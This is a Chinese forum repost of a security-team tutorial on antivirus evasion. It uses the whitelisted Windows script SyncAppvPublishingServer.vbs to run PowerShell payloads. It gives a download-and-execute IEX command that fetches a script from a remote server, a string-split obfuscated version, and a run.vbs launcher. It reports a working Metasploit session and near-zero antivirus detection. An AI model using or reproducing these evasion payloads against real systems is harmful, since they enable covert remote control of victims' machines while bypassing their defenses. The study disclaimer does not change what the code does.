"/>
·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
DZ插件网 门户 网站安全 查看内容

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

2022-8-2 01:10| 发布者: admin| 查看: 648| 评论: 0|原作者: 白帽子

摘要: 了解远控免杀技术中使用白名单SyncAppvPublishingServer.vbs执行payload的方法及应对措施。

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!



声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


一、SyncAppvPublishingServer 简介

Windows上有两个版本的SyncAppVPublishingServer工具,它们是:SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他们来取代powershell。

二、SyncAppvPublishingServer 使用

在powershell下执行

SyncAppvPublishingServer.vbs break;powershell代码

测试过程中使用的是SyncAppvPublishingServer.vbs,SyncAppvPublishingServer.exe 没有成功

在cmd里是无法执行powershell命令的

该命令需要在powershell里进行执行

因此powershell脚本都可以通过SyncAppvPublishingServer.vbs来运行。

三、SyncAppvPublishingServer 执行payload

使用powershell木马。

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"

将powershell脚本进行混淆使用IEX远程加载执行payload。

$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)

msf可正常上线。

在实战中也可以直接写成vbs脚本 run.vbs

Set oShell=WScript.CreateObject("WScript.Shell")
oShell.run "SyncAppvPublishingServer.vbs ;$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

点击run.vbs也可以正常上线。

火绒、360均没有检测出

放在virustotal.com上a.bat查杀率为1/56

四、参考资料

Powershell Without Powershell.exe

https://www.youtube.com/watch?v=sema3EYnP2c



E


N


D





guān


zhù



men



Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:





上一篇:分享一个图形数据库Neo4j的PHP库!
下一篇:CVE-2021-40444漏洞深入分析

鲜花

握手

雷人

路过

鸡蛋

评论

您需要登录后才可以发表言论 登录立即注册
创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:3.145.110.145,GMT+8, 2024-12-26 09:22 , Processed in 0.175118 second(s), 49 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯
扫一扫添加微信客服
QQ客服返回顶部
返回顶部